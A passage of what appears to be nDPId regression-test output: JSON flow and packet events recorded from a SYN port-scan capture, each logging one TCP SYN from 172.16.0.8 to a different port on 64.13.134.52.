-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsiBQAACUGm16sEAAIQA2GNIzTw1bdU4MZAAAAAGACCABtNQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsKjIAADIG7ECsEAAIQA2GNIzTIc7dU4MZAAAAAGACDAAKvgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsmVUAADkGdh2sEAAIQA2GNIzTCHDdU4MZAAAAAGACCAAoHAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs4M4AADcGMKSsEAAIQA2GNIzT1xDdU4MZAAAAAGACEABRewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsXlYAADsGrxysEAAIQA2GNIzTFbPdU4MZAAAAAGACEAAS2QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsbTcAACYGtTusEAAIQA2GNIzTH1bdU4MZAAAAAGACDAANNgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EEAADsGKTGsEAAIQA2GNIzTII3dU4MZAAAAAGACEAAH\/wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsaQQAAC0Gsm6sEAAIQA2GNIzTDvTdU4MZAAAAAGACCAAhmAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsWokAAC0GwOmsEAAIQA2GNIzTF+vdU4MZAAAAAGACCAAYoQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsA3wAAC0GF\/esEAAIQA2GNIzTB\/jdU4MZAAAAAGACCAAolAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs5fgAACwGNnqsEAAIQA2GNIzTBizdU4MZAAAAAGACBAAuYAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs2OsAADMGPIesEAAIQA2GNIzTIzPdU4MZAAAAAGACEAAFWQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsPK0AADcG1MWsEAAIQA2GNIzTBK7dU4MZAAAAAGACEAAj3gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs7dgAADoGIJqsEAAIQA2GNIzTF6vdU4MZAAAAAGACDAAU4QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAstjAAAC4GZEKsEAAIQA2GNIzTA4\/dU4MZAAAAAGACDAAo\/QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsdgUAADAGom2sEAAIQA2GNIzTB\/3dU4MZAAAAAGACBAAsjwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAscB4AACgGsFSsEAAIQA2GNIzTE8XdU4MZAAAAAGACBAAgxwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061212,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_packet_id":1,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061212,"pkt":"ACYLMQczACWzv5HuCABFAAAsgvYAADYGj3ysEAAIQA2GNIzTBZrdU4MZAAAAAGACDAAm8gAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061212,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_packet_id":1,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061212,"pkt":"ACYLMQczACWzv5HuCABFAAAszC8AADYGRkOsEAAIQA2GNIzT92PdU4MZAAAAAGACDAA1KAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061213,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_packet_id":1,"flow_last_seen":1278275061213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061213,"pkt":"ACYLMQczACWzv5HuCABFAAAsKEUAAC4G8i2sEAAIQA2GNIzTxNXdU4MZAAAAAGACDABntgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsDBEAACsGEWKsEAAIQA2GNIzTBNTdU4MZAAAAAGACEAAjuAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsbRQAACYGtV6sEAAIQA2GNIzTB9jdU4MZAAAAAGACDAAktAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsyTQAACUGWj6sEAAIQA2GNIzTBA7dU4MZAAAAAGACCAAsfgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsQj4AACwG2jSsEAAIQA2GNIzSAQPdUoMYAAAAAGACBAAzjAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsc\/gAACgGrHqsEAAIQA2GNIzSKAPdUoMYAAAAAGACBAAMjAAAAgQFtA=="} 